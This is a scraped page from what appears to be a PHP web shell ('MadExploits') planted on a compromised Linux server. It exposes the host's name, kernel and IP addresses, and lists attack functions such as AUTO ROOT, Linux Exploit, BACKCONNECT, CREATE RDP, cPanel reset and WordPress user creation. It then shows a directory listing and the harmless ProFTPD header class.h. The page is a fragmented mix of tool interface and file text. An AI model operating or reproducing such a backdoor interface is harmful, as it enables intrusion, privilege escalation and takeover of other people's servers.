Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.27
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
proftpd /
[ HOME SHELL ]
Name
Size
Permission
Action
ascii.h
2.61
KB
-rw-r--r--
auth.h
6.23
KB
-rw-r--r--
base.h
3.42
KB
-rw-r--r--
bindings.h
7.84
KB
-rw-r--r--
buildstamp.h
51
B
-rw-r--r--
ccan-json.h
3.59
KB
-rw-r--r--
child.h
1.48
KB
-rw-r--r--
class.h
3.02
KB
-rw-r--r--
cmd.h
4.36
KB
-rw-r--r--
compat.h
2.03
KB
-rw-r--r--
conf.h
3.86
KB
-rw-r--r--
config.h
35.38
KB
-rw-r--r--
configdb.h
5.73
KB
-rw-r--r--
ctrls.h
8.09
KB
-rw-r--r--
data.h
2.52
KB
-rw-r--r--
default_paths.h
2.97
KB
-rw-r--r--
dirtree.h
7.47
KB
-rw-r--r--
display.h
2.46
KB
-rw-r--r--
encode.h
3.67
KB
-rw-r--r--
env.h
1.87
KB
-rw-r--r--
error.h
18.45
KB
-rw-r--r--
event.h
3.5
KB
-rw-r--r--
expr.h
2.16
KB
-rw-r--r--
feat.h
1.27
KB
-rw-r--r--
filter.h
2.06
KB
-rw-r--r--
fsio.h
18.59
KB
-rw-r--r--
ftp.h
8.98
KB
-rw-r--r--
glibc-glob.h
7.12
KB
-rw-r--r--
hanson-tpl.h
4.4
KB
-rw-r--r--
help.h
1.24
KB
-rw-r--r--
ident.h
1.3
KB
-rw-r--r--
inet.h
5.27
KB
-rw-r--r--
jot.h
8.44
KB
-rw-r--r--
json.h
6.13
KB
-rw-r--r--
lastlog.h
1.62
KB
-rw-r--r--
log.h
6.66
KB
-rw-r--r--
logfmt.h
3.3
KB
-rw-r--r--
memcache.h
4.94
KB
-rw-r--r--
mkhome.h
1.53
KB
-rw-r--r--
mod_ctrls.h
3.96
KB
-rw-r--r--
mod_sftp.h
10
KB
-rw-r--r--
mod_tls.h
6.33
KB
-rw-r--r--
modules.h
6.3
KB
-rw-r--r--
netacl.h
2.51
KB
-rw-r--r--
netaddr.h
15.62
KB
-rw-r--r--
netio.h
7.98
KB
-rw-r--r--
openbsd-blowfish.h
2.9
KB
-rw-r--r--
options.h
8.13
KB
-rw-r--r--
os.h
7.22
KB
-rw-r--r--
parser.h
6.2
KB
-rw-r--r--
pidfile.h
1.3
KB
-rw-r--r--
pool.h
4.04
KB
-rw-r--r--
pr-syslog.h
3.47
KB
-rw-r--r--
privs.h
2.55
KB
-rw-r--r--
proctitle.h
1.64
KB
-rw-r--r--
proftpd.h
9.38
KB
-rw-r--r--
random.h
1.29
KB
-rw-r--r--
redis.h
15.58
KB
-rw-r--r--
regexp.h
3.63
KB
-rw-r--r--
response.h
3.07
KB
-rw-r--r--
rlimit.h
1.83
KB
-rw-r--r--
scoreboard.h
4.57
KB
-rw-r--r--
session.h
4.33
KB
-rw-r--r--
sets.h
1.94
KB
-rw-r--r--
signals.h
1.42
KB
-rw-r--r--
stash.h
2.12
KB
-rw-r--r--
str.h
5.59
KB
-rw-r--r--
support.h
4.39
KB
-rw-r--r--
table.h
11.43
KB
-rw-r--r--
throttle.h
1.26
KB
-rw-r--r--
timers.h
3.29
KB
-rw-r--r--
trace.h
2.36
KB
-rw-r--r--
utf8.h
1.37
KB
-rw-r--r--
var.h
4.32
KB
-rw-r--r--
version.h
1.59
KB
-rw-r--r--
xferlog.h
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class.h
/* * ProFTPD - FTP server daemon * Copyright (c) 2003-2017 The ProFTPD Project team * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Suite 500, Boston, MA 02110-1335, USA. * * As a special exemption, the ProFTPD Project team and other respective * copyright holders give permission to link this program with OpenSSL, and * distribute the resulting executable, without including the source code for * OpenSSL in the source distribution. */ /* Class definitions */ #ifndef PR_CLASS_H #define PR_CLASS_H #include "table.h" #include "netaddr.h" #include "netacl.h" typedef struct class_struc { pool *cls_pool; char *cls_name; unsigned int cls_satisfy; array_header *cls_acls; pr_table_t *cls_notes; struct class_struc *cls_next; } pr_class_t; #define PR_CLASS_SATISFY_ANY 0 #define PR_CLASS_SATISFY_ALL 1 /* Returns the class object associated with the given name, or NULL if * there is no matching class object. */ const pr_class_t *pr_class_find(const char *name); /* Iterate through the Class list, returning the next class. Returns NULL * once the end of the list is reached. If prev is NULL, the iterator * restarts at the beginning of the list. */ const pr_class_t *pr_class_get(const pr_class_t *prev); /* Returns TRUE if the given class object rules are satisfied/fulfilled by * the provided address, FALSE if not, and -1 on error. */ int pr_class_satisfied(pool *p, const pr_class_t *cls, const pr_netaddr_t *addr); /* Returns the class object for which the given address matches every rule. * If multiple classes exist that might match the given address, the first * defined class matches. */ const pr_class_t *pr_class_match_addr(const pr_netaddr_t *addr); /* Start a new class object, allocated from the given pool, with the given * name. */ int pr_class_open(pool *p, const char *name); /* Close the current class object. * * Note that -1 may be returned. This can happen, for example, if the * current class object has no associated rules, i.e. is empty. */ int pr_class_close(void); /* Add the given ACL object to the currently opened class object. */ int pr_class_add_acl(const pr_netacl_t *acl); /* Set the Satisfy flag on the currently opened class object. */ int pr_class_set_satisfy(int flags); /* Set a note on the currently opened class object. */ int pr_class_add_note(const char *key, void *val, size_t valsz); /* For internal use only. */ void init_class(void); #endif /* PR_CLASS_H */
Close